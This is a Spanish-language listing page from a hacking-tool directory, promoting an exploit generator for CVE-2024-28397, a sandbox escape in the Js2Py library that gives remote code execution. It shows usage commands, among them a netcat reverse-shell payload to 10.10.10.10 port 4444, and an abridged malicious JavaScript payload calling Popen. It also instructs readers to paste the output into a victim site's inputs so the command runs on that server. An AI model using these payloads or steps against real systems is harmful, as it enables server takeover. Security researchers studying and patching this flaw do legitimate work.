Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-28397-Js2Py-RCE-Exploit — Exploit profesional para CVE-2024-28397: escape de la sandbox de Js2Py que conduce a ejecución remota de código (RCE). Incluye generación modular de payloads. | Kitploit
Herramientas/GitHubGitHub/xeloxa/cve-2024-28397-js2py-rce-exploit
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubxeloxa/cve-2024-28397-js2py-rce-exploit

CVE-2024-28397-Js2Py-RCE-Exploit

Exploit profesional para CVE-2024-28397: escape de la sandbox de Js2Py que conduce a ejecución remota de código (RCE). Incluye generación modular de payloads.

Ver RepositorioSitio web
212hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Vista previa del informe técnico

💡 Análisis en profundidad: Haz clic aquí para leer el informe técnico completo (PDF).

CVE-2024-28397: Generador de payloads para evasión de sandbox en Js2Py

Python License CVE

Un generador de payloads profesional para CVE-2024-28397. Esta herramienta genera código JavaScript malicioso diseñado para escapar del sandbox de js2py (versiones <= 0.74) y ejecutar comandos arbitrarios en el sistema objetivo.

🚨 Detalles de la vulnerabilidad

  • ID de CVE: CVE-2024-28397
  • <= 0.74
Componente afectado:
Js2Py
  • Impacto: Ejecución remota de código (RCE) / Evasión de sandbox
  • Mecanismo: Explota Object.getOwnPropertyNames para acceder a la clase subprocess.Popen de Python desde el entorno JavaScript.
  • 🚀 Uso

    Este script genera el payload de JavaScript exacto necesario para explotar la vulnerabilidad. No necesitas instalar js2py para usar esta herramienta.

    1. Generar un payload

    Ejecuta el script con el comando que quieras ejecutar en la máquina de la víctima.

    root@kitploit:~
    # Generate payload to run 'id'
    python3 exploit.py -c "id"
    
    root@kitploit:~
    # Generate payload for a Reverse Shell
    python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"
    

    2. Atacar el objetivo

    Copia la salida generada por la herramienta e inyéctala en la aplicación vulnerable (por ejemplo, un formulario web, un endpoint de API o un archivo de configuración procesado por js2py).

    Ejemplo de inyección: Si un sitio web toma la entrada del usuario y la ejecuta con js2py.eval_js(user_input), pegar el código generado ejecutará tu comando en su servidor.

    📝 Ejemplo

    root@kitploit:~
    $ python3 exploit.py -c "whoami"
    
        var output = "Initial";
        try {
            var leaked_wrapper = Object.getOwnPropertyNames({});
            // ... (full malicious code) ...
            var res = Popen("whoami", ...).communicate();
            output = res;
        } ...
        output
    

    👨‍💻 Autor

    Ali Sünbül (xeloxa)

    • 📧 Correo electrónico: [email protected]
    • 🌐 Sitio web: xeloxa.netlify.app
    • 🐙 GitHub: @xeloxa

    ⚠️ Aviso legal

    Este software se proporciona únicamente con fines educativos y de investigación en seguridad. El autor no acepta ninguna responsabilidad por el mal uso de este código. Asegúrate de tener permiso explícito antes de probar esto en cualquier sistema que no sea tuyo.

    Descargar herramienta